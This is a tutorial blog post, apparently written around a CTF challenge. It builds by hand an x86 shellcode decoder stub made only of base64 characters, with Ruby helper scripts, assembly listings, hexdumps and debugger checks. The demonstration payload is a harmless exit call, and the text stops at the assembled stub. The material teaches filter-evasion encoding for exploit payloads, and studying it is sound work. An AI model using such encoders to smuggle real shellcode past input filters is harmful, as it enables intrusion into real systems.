In this post, we're going to write a base64 decoder stub by hand, which encodes some super simple shellcode. I'll also post a link to a tool I wrote to automate this.

I can't promise that this is the best, or the easiest, or even a sane way to do this. I came up with this process all by myself, but I have to imagine that the generally available encoders do basically the same thing. :)

Intro to Shellcode

I don't want to dwell too much on the basics, so I highly recommend reading, which is a primer on assembly code and shellcode that I recently wrote for a workshop I taught.

The idea behind the challenge is that you send the server arbitrary binary data. That data would be encoded into base64, then the base64 string was run as if it were machine code. That means that your machine code had to be made up of characters in the set [a-zA-Z0-9+/]. You could also have an equal sign ("=") or two on the end, but that's not really useful.

We're going to mostly focus on how to write base64-compatible shellcode, then bring it back to the challenge at the very end.

Assembly instructions

Since each assembly instruction has a 1:1 relationship to the machine code it generates, it'd be helpful to us to get a list of all instructions we have available that stay within the base64 character set.

To get an idea of which instructions are available, I wrote a quick Ruby script that would attempt to disassemble every possible combination of two characters followed by some static data.

I originally did this by scripting out to ndisasm on the commandline, a tool that we'll see used throughout this blog, but I didn't keep that code. Instead, I'm going to use the Crabstone Disassembler, which is Ruby bindings for Capstone:

require 'crabstone'

# Our set of known characters
SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

# Create an instance of the Crabstone Disassembler for 32-bit x86
cs =, Crabstone::MODE_32)

# Get every 2-character combination
SET.chars.each do |c1|
  SET.chars.each do |c2|
    # Pad it out pretty far with obvious no-op-ish instructions
    data = c1 + c2 + ("A" * 14)

    # Disassemble it and get the first instruction (we only care about the
    # shortest instructions we can form)
    instruction = cs.disasm(data, 0)[0]

    puts "%s     %s %s" % [ { |b| '%02x' % b }.join(' '),

I'd probably do it considerably more tersely in irb if I was actually solving a challenge rather than writing a blog, but you get the idea. :)

Anyway, running that produces quite a lot of output. We can feed it through sort + uniq to get a much shorter version.

From there, I manually went through the full 2000+ element list to figure out what might actually be useful (since the vast majority were basically identical, that's easier than it sounds). I moved all the good stuff to the top and got rid of the stuff that's useless for writing a decoder stub. That left me with this list. I left in a bunch of stuff (like multiply instructions) that probably wouldn't be useful, but that I didn't want to completely discount.

Dealing with a limited character set

When you write shellcode, there are a few things you have to do. At a minimum, you almost always have to change registers to fairly arbitrary values (like a command to execute, a file to read/write, etc) and make syscalls ("int 0x80" in assembly or "\xcd\x80" in machine code; we'll see how that winds up being the most problematic piece!).

For the purposes of this blog, we're going to have 12 bytes of shellcode: a simple call to the sys_exit() syscall, with a return code of 0x41414141. The reason is, it demonstrates all the fundamental concepts (setting variables and making syscalls), and is easy to verify as correct using strace

Here's the shellcode we're going to be working with:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

We'll be using this code throughout, so make sure you have a pretty good grasp of it! It assembles to (on Ubuntu, if this fails, try apt-get install nasm):

$ echo -e 'bits 32\n\nmov eax, 0x01\nmov ebx, 0x41414141\nint 0x80\n' > file.asm; nasm -o file file.asm
$ hexdump -C file
00000000  b8 01 00 00 00 bb 41 41  41 41 cd 80              |............|

If you want to try running it, you can use my run_raw_code.c utility (there are plenty just like it):

$ strace ./run_raw_code file
read(3, "\270\1\0\0\0\273AAAA\315\200", 12) = 12
exit(1094795585)                        = ?

The read() call is where the run_raw_code stub is reading the shellcode file. The 1094795585 in exit() is the 0x41414141 that we gave it. We're going to see that value again and again and again, as we evaluate the correctness of our code, so get used to it!

You can also prove that it disassembles properly, and see what each line becomes using the ndisasm utility (this is part of the nasm package):

$ ndisasm -b32 file
00000000  B801000000        mov eax,0x1
00000005  BB41414141        mov ebx,0x41414141
0000000A  CD80              int 0x80

Easy stuff: NUL byte restrictions

Let's take a quick look at a simple character restriction: NUL bytes. It's commonly seen because NUL bytes represent string terminators. Functions like strcpy() stop copying when they reach a NUL. Unlike base64, this can be done by hand!

It's usually pretty straight forward to get rid of NUL bytes by just looking at where they appear and fixing them; it's almost always the case that it's caused by 32-bit moves or values, so we can just switch to 8-bit moves (using eax is 32 bits; using al, the last byte of eax, is 8 bits):

xor eax, eax ; Set eax to 0
inc eax ; Increment eax (set it to 1) - could also use "mov al, 1", but that's one byte longer
mov ebx, 0x41414141 ; Set ebx to the usual value, no NUL bytes here
int 0x80 ; Perform the syscall

We can prove this works, as well (I'm going to stop showing the echo as code gets more complex, but I use file.asm throughout):

$ echo -e 'bits 32\n\nxor eax, eax\ninc eax\nmov ebx, 0x41414141\nint 0x80\n'> file.asm; nasm -o file file.asm
$ hexdump -C file
00000000  31 c0 40 bb 41 41 41 41  cd 80                    |1.@.AAAA..|


Clearing eax in base64

Something else to note: our shellcode is now largely base64! Let's look at the disassembled version so we can see where the problems are:

$ ndisasm -b32 file                               65 [11:16:34]
00000000  31C0              xor eax,eax
00000002  40                inc eax
00000003  BB41414141        mov ebx,0x41414141
00000008  CD80              int 0x80

Okay, maybe we aren't so close: the only line that's actually compatible is "inc eax". I guess we can start the long journey!

Let's start by looking at how we can clear eax using our instruction set. We have a few promising instructions for changing eax, but these are the ones I like best:

  • 35 ?? ?? ?? ?? xor eax,0x????????
  • 68 ?? ?? ?? ?? push dword 0x????????
  • 58 pop eax

Let's start with the most naive approach:

push 0
pop eax

If we assemble that, we get:

00000000  6A00              push byte +0x0
00000002  58                pop eax

Close! But because we're pushing 0, we end up with a NUL byte. So let's push something else:

push 0x41414141
pop eax

If we look at how that assembles, we get:

00000000  68 41 41 41 41 58                                 |hAAAAX|

Not only is it all Base64 compatible now, it also spells "hAAAAX", which is a fun coincidence. :)

The problem is, eax doesn't end up as 0, it's 0x41414141. You can verify this by adding "int 3" at the bottom, dumping a corefile, and loading it in gdb (feel free to use this trick throughout if you're following along, I'm using it constantly to verify my code snippings, but I'll only show it when the values are important):

$ ulimit -c unlimited
$ rm core
$ cat file.asm
bits 32

push 0x41414141
pop eax
int 3
$ nasm -o file file.asm
$ ./run_raw_code ./file
allocated 8 bytes of executable memory at: 0x41410000
fish: “./run_raw_code ./file” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Core was generated by `./run_raw_code ./file`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410008 in ?? ()
(gdb) print/x $eax
$1 = 0x41414141

Anyway, if we don't like the value, we can xor a value with eax, provided that the value is also base64-compatible! So let's do that:

push 0x41414141
pop eax
xor eax, 0x41414141

Which assembles to:

00000000  68 41 41 41 41 58 35 41  41 41 41                 |hAAAAX5AAAA|

All right! You can verify using the debugger that, at the end, eax is, indeed, 0.

Encoding an arbitrary value in eax

If we can set eax to 0, does that mean we can set it to anything?

Since xor works at the byte level, the better question is: can you xor two base-64-compatible bytes together, and wind up with any byte?

Turns out, the answer is no. Not quite. Let's look at why!

We'll start by trying a pure bruteforce (this code is essentially from my solution):

SET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';
def find_bytes(b)
  SET.bytes.each do |b1|
    SET.bytes.each do |b2|
      if((b1 ^ b2) == b)
        return [b1, b2]
  puts("Error: Couldn't encode 0x%02x!" % b)
  return nil

0.upto(255) do |i|
  puts("%x => %s" % [i, find_bytes(i)])

The full output is here, but the summary is:

0 => [65, 65]
1 => [66, 67]
2 => [65, 67]
3 => [65, 66]
7d => [68, 57]
7e => [70, 56]
7f => [70, 57]
Error: Couldn't encode 0x80!
80 =>
Error: Couldn't encode 0x81!
81 =>
Error: Couldn't encode 0x82!
82 =>

Basically, we can encode any value that doesn't have the most-significant bit set (ie, anything under 0x80). That's going to be a problem that we'll deal with much, much later.

Since many of our instructions operate on 4-byte values, not 1-byte values, we want to operate in 4-byte chunks. Fortunately, xor is byte-by-byte, so we just need to treat it as four individual bytes:

def get_xor_values_32(desired)
  # Convert the integer into a string (pack()), then into the four bytes
  b1, b2, b3, b4 = [desired].pack('N').bytes()

  v1 = find_bytes(b1)
  v2 = find_bytes(b2)
  v3 = find_bytes(b3)
  v4 = find_bytes(b4)

  # Convert both sets of xor values back into integers
  result = [
    [v1[0], v2[0], v3[0], v4[0]].pack('cccc').unpack('N').pop(),
    [v1[1], v2[1], v3[1], v4[1]].pack('cccc').unpack('N').pop(),

  # Note: I comment these out for many of the examples, simply for brevity
  puts '0x%08x' % result[0]
  puts '0x%08x' % result[1]
  puts('0x%08x' % (result[0] ^ result[1]))

  return result

This function takes a single 32-bit value and it outputs the two xor values (note that this won't work when the most significant bit is set.. stay tuned for that!):

irb(main):039:0> get_xor_values_32(0x01020304)

=> [1111572801, 1128481349]

irb(main):040:0> get_xor_values_32(0x41414141)

=> [1785358954, 724249387]

And so on.

So if we want to set eax to 0x00000001 (for the sys_exit syscall), we can simply feed it into this code and convert it to assembly:


=> [1094795586, 1094795587]

Then write the shellcode:

push 0x41414142
pop eax
xor eax, 0x41414143

And prove to ourselves that it's base-64-compatible; I believe in doing this, because every once in awhile an instruction like "inc eax" (which becomes '@') will slip in when I'm not paying attention:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41                 |hBAAAX5CAAA|

We'll be using that exact pattern a lot - push (value) / pop eax / xor eax, (other value). It's the most fundamental building block of this project!

Setting other registers

Sadly, unless I missed something, there's no easy way to set other registers. We can increment or decrement them, and we can pop values off the stack into some of them, but we don't have the ability to xor, mov, or anything else useful!

There are basically three registers that we have easy access to:

  • 58 pop eax
  • 59 pop ecx
  • 5A pop edx

So to set ecx to an arbitrary value, we can do it via eax:

push 0x41414142
pop eax
xor eax, 0x41414143 ; eax -> 1
push eax
pop ecx ; ecx -> 1

Then verify the base64-ness:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41 50 59           |hBAAAX5CAAAPY|

Unfortunately, if we try the same thing with ebx, we hit a non-base64 character:

$ hexdump -C file
00000000  68 42 41 41 41 58 35 43  41 41 41 50 5b           |hBAAAX5CAAAP[|

Note the "[" at the end - that's not in our character set! So we're pretty much limited to using eax, ecx, and edx for most things.

But wait, there's more! We do, however, have access to popad. The popad instruction pops the next 8 things off the stack and puts them in all 8 registers. It's a bit of a scorched-earth method, though, because it overwrites all registers. We're going to use it at the start of our code to zero-out all the registers.

Let's try to convert our exit shellcode from earlier:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Into something that's base-64 friendly:

; We'll start by populating the stack with 0x41414141's
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141
push 0x41414141

; Then popad to set all the registers to 0x41414141

; Then set eax to 1
push 0x41414142
pop eax
xor eax, 0x41414143

; Finally, do our syscall (as usual, we're going to ignore the fact that the syscall isn't base64 compatible)
int 0x80

Prove that it uses only base64 characters (except the syscall):

$ hexdump -C file
00000000  68 41 41 41 41 68 41 41  41 41 68 41 41 41 41 68  |hAAAAhAAAAhAAAAh|
00000010  41 41 41 41 68 41 41 41  41 68 41 41 41 41 68 41  |AAAAhAAAAhAAAAhA|
00000020  41 41 41 68 41 41 41 41  61 68 42 41 41 41 58 35  |AAAhAAAAahBAAAX5|
00000030  43 41 41 41 cd 80                                 |CAAA..|

And prove that it still works:

$ strace ./run_raw_code ./file
read(3, "hAAAAhAAAAhAAAAhAAAAhAAAAhAAAAhA"..., 54) = 54
exit(1094795585)                        = ?

Encoding the actual code

You've probably noticed by now: this is a lot of work. Especially if you want to set each register to a different non-base64-compatible value! You have to encode each value by hand, making sure you set eax last (because it's our working register). And what if you need an instruction (like add, or shift) that isn't available? Do we just simulate it?

As I'm sure you've noticed, the machine code is just a bunch of bytes. What's stopping us from simply encoding the machine code rather than just values?

Let's take our original example of an exit again:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Because 'mov' assembles to 0xb8XXXXXX, I don't want to deal with that yet (the most-significant bit is set). So let's change it a bit to keep each byte (besides the syscall) under 0x80:

00000000  6A01              push byte +0x1
00000002  58                pop eax
00000003  6841414141        push dword 0x41414141
00000008  5B                pop ebx

Or, as a string of bytes:


Let's pad that to a multiple of 4 so we can encode in 4-byte chunks (we pad with 'A', because it's as good a character as any):


then break that string into 4-byte chunks, encoding as little endian (reverse byte order):

  • 6a 01 58 68 -> 0x6858016a
  • 41 41 41 41 -> 0x41414141
  • 5b 41 41 41 -> 0x4141415b

Then run each of those values through our get_xor_values_32() function from earlier:

irb(main):047:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x6858016a)
0x43614241 ^ 0x2b39432b

irb(main):048:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41414141)
0x6a6a6a6a ^ 0x2b2b2b2b

irb(main):050:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x4141415b)
0x6a6a6a62 ^ 0x2b2b2b39

Let's start our decoder by simply calculating each of these values in eax, just to prove that they're all base64-compatible (note that we are simply discarding the values in this example, we aren't doing anything with them quite yet):

push 0x43614241
pop eax
xor eax, 0x2b39432b ; 0x6858016a

push 0x6a6a6a6a
pop eax
xor eax, 0x2b2b2b2b ; 0x41414141

push 0x6a6a6a62
pop eax
xor eax, 0x2b2b2b39 ; 0x4141415b

Which assembles to:

$ hexdump -Cv file
00000000  68 41 42 61 43 58 35 2b  43 39 2b 68 6a 6a 6a 6a  |hABaCX5+C9+hjjjj|
00000010  58 35 2b 2b 2b 2b 68 62  6a 6a 6a 58 35 39 2b 2b  |X5++++hbjjjX59++|
00000020  2b                                                |+|

Looking good so far!

Decoder stub

Okay, we've proven that we can encode instructions (without the most significant bit set)! Now we actually want to run it!

Basically: our shellcode is going to start with a decoder, followed by a bunch of encoded bytes. We'll also throw some padding in between to make this easier to do by hand. The entire decoder has to be made up of base64-compatible bytes, but the encoded payload (ie, the shellcode) has no restrictions.

So now we actually want to alter the shellcode in memory (self-rewriting code!). We need an instruction to do that, so let's look back at the list of available instructions! After some searching, I found one that's promising:

3151??            xor [ecx+0x??],edx

This command xors the 32-bit value at memory address ecx+0x?? with edx. We know we can easily control ecx (push (value) / pop eax / xor (other value) / push eax / pop ecx) and, similarly edx. Since the "0x??" value has to also be a base64 character, we'll follow our trend and use [ecx+0x41], which gives us:

315141            xor [ecx+0x41],edx

Once I found that command, things started coming together! Since I can control eax, ecx, and edx pretty cleanly, that's basically the perfect instruction to decode our shellcode in-memory!

This is somewhat complex, so let's start by looking at the steps involved:

  • Load the encoded shellcode (half of the xor pair, ie, the return value from get_xor_values_32()) into a known memory address (in our case, it's going to be 0x141 bytes after the start of our code)
  • Set ecx to the value that's 0x41 bytes before that encoded shellcode (0x100)
  • For each 32-bit pair in the encoded shellcode...
    • Load the other half of the xor pair into edx
    • Do the xor to alter it in-memory (ie, decode it back to the original, unencoded value)
    • Increment ecx to point at the next value
    • Repeat for the full payload
  • Run the newly decoded payload

For the sake of our sanity, we're going to make some assumptions in the code: first, our code is loaded to the address 0x41410000 (which it is, for this challenge). Second, the decoder stub is exactly 0x141 bytes long (we will pad it to get there). Either of these can be easily worked around, but it's not necessary to do the extra work in order to grok the decoder concept.

Recall that for our sys_exit shellcode, the xor pairs we determined were: 0x43614241 ^ 0x2b39432b, 0x6a6a6a6a ^ 0x2b2b2b2b, and 0x6a6a6a62 ^ 0x2b2b2b39.

Here's the code:

; Set ecx to 0x41410100 (0x41 bytes less than the start of the encoded data)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; eax -> 0x41410100
push eax
pop ecx ; ecx -> 0x41410100

; Set edx to the first value in the first xor pair
push 0x43614241
pop edx

; xor it with the second value in the first xor pair (which is at ecx + 0x41)
xor [ecx+0x41], edx

; Move ecx to the next 32-bit value
inc ecx
inc ecx
inc ecx
inc ecx

; Set edx to the first value in the second xor pair
push 0x6a6a6a6a
pop edx

; xor + increment ecx again
xor [ecx+0x41], edx
inc ecx
inc ecx
inc ecx
inc ecx

; Set edx to the first value in the third and final xor pair, and xor it
push 0x6a6a6a62
pop edx
xor [ecx+0x41], edx

; At this point, I assembled the code and counted the bytes; we have exactly 0x30 bytes of code so far. That means to get our encoded shellcode to exactly 0x141 bytes after the start, we need 0x111 bytes of padding ('A' translates to inc ecx, so it's effectively a no-op because the encoded shellcode doesn't care what ecx starts as):

; Now, the second halves of our xor pairs; this is what gets modified in-place
dd 0x2b39432b
dd 0x2b2b2b2b
dd 0x2b2b2b39

; And finally, we're going to cheat and just do a syscall that's non-base64-compatible
int 0x80

All right! Here's what it gives us; note that other than the syscall at the end (we'll get to that, I promise!), it's all base64:

$ hexdump -Cv file
00000000  68 41 42 6a 6a 58 35 41  43 2b 2b 50 59 68 41 42  |hABjjX5AC++PYhAB|
00000010  61 43 5a 31 51 41 41 41  41 41 68 6a 6a 6a 6a 5a  |aCZ1QAAAAAhjjjjZ|
00000020  31 51 41 41 41 41 41 68  62 6a 6a 6a 5a 31 51 41  |1QAAAAAhbjjjZ1QA|
00000030  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000040  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000050  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000060  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000070  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000080  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000090  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000000f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000100  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000110  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000120  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 2b 43 39 2b 2b 2b 2b  2b 39 2b 2b 2b cd 80     |A+C9+++++9+++..|

To run this, we have to patch run_raw_code.c to load the code to the correct address:

diff --git a/forensics/ximage/solution/run_raw_code.c b/forensics/ximage/solution/run_raw_code.c
index 9eadd5e..1ad83f1 100644
--- a/forensics/ximage/solution/run_raw_code.c
+++ b/forensics/ximage/solution/run_raw_code.c
@@ -12,7 +12,7 @@ int main(int argc, char *argv[]){

-  void * a = mmap(0, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
+  void * a = mmap(0x41410000, statbuf.st_size, PROT_EXEC |PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
   printf("allocated %d bytes of executable memory at: %p\n", statbuf.st_size, a);

   FILE *file = fopen(argv[1], "rb");

You'll also have to compile it in 32-bit mode:

$ gcc -m32 -o run_raw_code run_raw_code.c

Once that's done, give 'er a shot:

$ strace ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
read(3, "hABjjX5AC++PYhABaCZ1QAAAAAhjjjjZ"..., 335) = 335
exit(1094795585)                        = ?

We did it, team!

If we want to actually inspect the code, we can change the very last padding 'A' into 0xcc (aka, int 3, or a SIGTRAP):

$ diff -u file.asm file-trap.asm
--- file.asm    2017-06-11 13:17:57.766651742 -0700
+++ file-trap.asm       2017-06-11 13:17:46.086525100 -0700
@@ -45,7 +45,7 @@

 ; Now, the second halves of our xor pairs
 dd 0x2b39432b

And run it with corefiles enabled:

$ nasm -o file file.asm
$ ulimit -c unlimited
$ ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./file
allocated 335 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ~/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./core
Core was generated by `/home/ron/projects/ctf-2017-release/forensics/ximage/solution/run_raw_code ./fi`.
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410141 in ?? ()
(gdb) x/10i $eip
=> 0x41410141:  push   0x1
   0x41410143:  pop    eax
   0x41410144:  push   0x41414141
   0x41410149:  pop    ebx
   0x4141014a:  inc    ecx
   0x4141014b:  inc    ecx
   0x4141014c:  inc    ecx
   0x4141014d:  int    0x80
   0x4141014f:  add    BYTE PTR [eax],al
   0x41410151:  add    BYTE PTR [eax],al

As you can see, our original shellcode is properly decoded! (The inc ecx instructions you're seeing is our padding.)

The decoder stub and encoded shellcode can be quite easily generated programmatically rather than doing it by hand, which is extremely error prone (it took me 4 tries to get it right - I messed up the start address, I compiled run_raw_code in 64-bit mode, and I got the endianness backwards before I finally got it right, which doesn't sound so bad, except that I had to go back and re-write part of this section and re-run most of the commands to get the proper output each time :) ).

That pesky most-significant-bit

So, I've been avoiding this, because I don't think I solved it in a very elegant way. But, my solution works, so I guess that's something. :)

As usual, we start by looking at our set of available instructions to see what we can use to set the most significant bit (let's start calling it the "MSB" to save my fingers).

Unfortunately, the easy stuff can't help us; xor can only set it if it's already set somewhere, we don't have any shift instructions, inc would take forever, and the subtract and multiply instructions could probably work, but it would be tricky.

Let's start with a simple case: can we set edx to 0x80?

First, let's set edx to the highest value we can, 0x7F (we choose edx because a) it's one of the three registers we can easily pop into; b) eax is our working variable since it's the only one we can xor; and c) we don't want to change ecx once we start going, since it points to the memory we're decoding):

irb(main):057:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x0000007F)
0x41414146 ^ 0x41414139

Using those values and our old push / pop / xor pattern, we can set edx to 0x80:

push 0x41414146
pop eax
xor eax, 0x41414139 ; eax -> 0x7F
push eax
pop edx ; edx -> 0x7F

; Now that edx is 0x7F, we can simply increment it
inc edx ; edx -> 0x80

That works out to:

00000000  68 46 41 41 41 58 35 39  41 41 41 50 5a 42        |hFAAAX59AAAPZB|

So far so good! Now we can do our usual xor to set that one bit in our decoded code:

xor [ecx+0x41], edx

This sets the MSB of whatever ecx+0x41 (our current instruction) is.

If we were decoding a single bit at a time, we'd be done. Unfortunately, we aren't so lucky - we're working in 32-bit (4-byte) chunks.

Setting edx to 0x00008000, 0x00800000, or 0x80000000

So how do we set edx to 0x00008000, 0x00800000, or 0x80000000 without having a shift instruction?

This is where I introduce a pretty ugly hack. In effect, we use some stack shenanigans to perform a poor-man's shift. This won't work on most non-x86/x64 systems, because they require a word-aligned stack (I was actually a little surprised it worked on x86, to be honest!).

Let's say we want 0x00008000. Let's just look at the code:

; Set all registers to 0 so we start with a clean slate, using the popad strategy from earlier (we need a register that's reliably 0)
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax

; Set edx to 0x00000080, just like before
push 0x41414146
pop eax
xor eax, 0x41414139 ; eax -> 0x7F
push eax
pop edx ; edx -> 0x7F
inc edx ; edx -> 0x80

; Push edi (which, like all registers, is 0) onto the stack
push edi ; 0x00000000

; Push edx onto the stack
push edx

; Move esp by 1 byte - note that this won't work on many architectures, but x86/x64 are fine with a misaligned stack
dec esp

; Get edx back, shifted by one byte
pop edx

; Fix the stack (not <em>really</em> necessary, but it's nice to do it
inc esp

; Add a debug breakpoint so we can inspect the value
int 3

And we can use gdb to prove it works with the same trick as before:

$ nasm -o file file.asm
$ rm -f core
$ ulimit -c unlimited
$ ./run_raw_code ./file
allocated 41 bytes of executable memory at: 0x41410000
fish: “~/projects/ctf-2017-release/for...” terminated by signal SIGTRAP (Trace or breakpoint trap)
$ gdb ./run_raw_code ./core
Program terminated with signal SIGTRAP, Trace/breakpoint trap.
#0  0x41410029 in ?? ()
(gdb) print/x $edx
$1 = 0x8000

We can do basically the exact same thing to set the third byte:

push edi ; 0x00000000
push edx
dec esp
dec esp ; <-- New
pop edx
inc esp
inc esp ; <-- New

And the fourth:

push edi ; 0x00000000
push edx
dec esp
dec esp
dec esp ; <-- New
pop edx
inc esp
inc esp
inc esp ; <-- New

Putting it all together

You can take a look at how I do this in my final code. It's going to be a little different, because instead of using our xor trick to set edx to 0x7F, I instead push 0x7a / pop edx / increment 6 times. The only reason is that I didn't think of the xor trick when I was writing the original code, and I don't want to mess with it now.

But, we're going to do it the hard way: by hand! I'm literally writing this code as I write the blog (and, message from the future: it worked on the second try :) ).

Let's just stick with our simple exit-with-0x41414141-status shellcode:

mov eax, 0x01 ; Syscall 1 = sys_exit
mov ebx, 0x41414141 ; First (and only) parameter: the exit code
int 0x80

Which assembles to this, which is conveniently already a multiple of 4 bytes so no padding required:

00000000  b8 01 00 00 00 bb 41 41  41 41 cd 80              |......AAAA..|

Since we're doing it by hand, let's extract all the MSBs into a separate string (remember, this is all done programmatically usually):

00000000  38 01 00 00 00 3b 41 41  41 41 4d 00              |......AAAA..|
00000000  80 00 00 00 00 80 00 00  00 00 80 80              |......AAAA..|

If you xor those two strings together, you'll get the original string back.

First, let's worry about the first string. It's handled exactly the way we did the last example. We start by getting the three 32-bit values as little endian values:

  • 38 01 00 00 -> 0x00000138
  • 00 3b 41 41 -> 0x41413b00
  • 41 41 4d 00 -> 0x004d4141

And then find the xor pairs to generate them just like before:

irb(main):061:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x00000138)
0x41414241 ^ 0x41414379

irb(main):062:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x41413b00)
0x6a6a4141 ^ 0x2b2b7a41

irb(main):063:0> puts '0x%08x ^ 0x%08x' % get_xor_values_32(0x004d4141)
0x41626a6a ^ 0x412f2b2b

But here's where the twist comes: let's take the MSB string above, and also convert that to little-endian integers:

  • 80 00 00 00 -> 0x00000080
  • 00 80 00 00 -> 0x00008000
  • 00 00 80 80 -> 0x80800000

Now, let's try writing our decoder stub just like before, except that after decoding the MSB-free vale, we're going to separately inject the MSBs into the code!

; Set all registers to 0 so we start with a clean slate, using the popad strategy from earlier
push 0x41414141
pop eax
xor eax, 0x41414141
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax

; Set ecx to 0x41410100 (0x41 bytes less than the start of the encoded data)
push 0x6a6a4241
pop eax
xor eax, 0x2b2b4341 ; 0x41410100
push eax
pop ecx

; xor the first pair
push 0x41414241
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x00000080, so let's load it into edx
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
xor [ecx+0x41], edx

; Move to the next value
inc ecx
inc ecx
inc ecx
inc ecx

; xor the second pair
push 0x6a6a4141
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x00008000
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080

push edi ; 0x00000000
push edx
dec esp
pop edx ; edx is now 0x00008000
inc esp
xor [ecx+0x41], edx

; Move to the next value
inc ecx
inc ecx
inc ecx
inc ecx

; xor the third pair
push 0x41626a6a
pop edx
xor [ecx+0x41], edx

; Now we need to xor with 0x80800000; we'll do it in two operations, with 0x00800000 first
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
push edi ; 0x00000000
push edx
dec esp
dec esp
pop edx ; edx is now 0x00800000
inc esp
inc esp
xor [ecx+0x41], edx

; And then the 0x80000000
push 0x41414146
pop eax
xor eax, 0x41414139 ; 0x0000007F
push eax
pop edx
inc edx ; edx is now 0x00000080
push edi ; 0x00000000
push edx
dec esp
dec esp
dec esp
pop edx ; edx is now 0x00800000
inc esp
inc esp
inc esp
xor [ecx+0x41], edx

; Padding (calculated based on the length above, subtracted from 0x141)

; The second halves of the pairs (ie, the encoded data; this is where the decoded data will end up by the time execution gets here)
dd 0x41414379
dd 0x2b2b7a41
dd 0x412f2b2b

And that's it! Let's try it out! The code leading up to the padding assembles to:

00000000  68 41 41 41 41 58 35 41  41 41 41 50 50 50 50 50  |hAAAAX5AAAAPPPPP|
00000010  50 50 50 61 68 41 42 6a  6a 58 35 41 43 2b 2b 50  |PPPahABjjX5AC++P|
00000020  59 68 41 42 41 41 5a 31  51 41 68 46 41 41 41 58  |YhABAAZ1QAhFAAAX|
00000030  35 39 41 41 41 50 5a 42  31 51 41 41 41 41 41 68  |59AAAPZB1QAAAAAh|
00000040  41 41 6a 6a 5a 31 51 41  68 46 41 41 41 58 35 39  |AAjjZ1QAhFAAAX59|
00000050  41 41 41 50 5a 42 57 52  4c 5a 44 31 51 41 41 41  |AAAPZBWRLZD1QAAA|
00000060  41 41 68 6a 6a 62 41 5a  31 51 41 68 46 41 41 41  |AAhjjbAZ1QAhFAAA|
00000070  58 35 39 41 41 41 50 5a  42 57 52 4c 4c 5a 44 44  |X59AAAPZBWRLLZDD|
00000080  31 51 41 68 46 41 41 41  58 35 39 41 41 41 50 5a  |1QAhFAAAX59AAAPZ|
00000090  42 57 52 4c 4c 4c 5a 44  44 44 31 51 41           |BWRLLLZDDD1QA|

